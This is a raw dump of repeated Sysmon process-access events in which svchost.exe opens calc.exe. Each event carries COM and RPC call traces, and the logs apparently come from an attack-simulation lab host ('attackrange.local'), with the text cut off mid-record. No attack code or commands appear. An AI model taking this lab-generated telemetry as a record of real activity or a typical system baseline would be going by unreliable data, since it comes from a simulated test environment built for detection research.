22:13:28.319{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361851Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.319{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361850Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.319{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361849Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.319{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361848Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.319{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361847Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.319{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361846Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.319{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361845Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.319{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361844Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.319{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361843Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.319{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361842Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.319{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361841Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.319{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361840Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.319{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361839Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.319{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361838Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.319{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361837Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.319{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361836Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.319{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361835Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.319{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361834Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.319{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361833Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.319{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361832Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.319{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361831Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.319{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361830Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 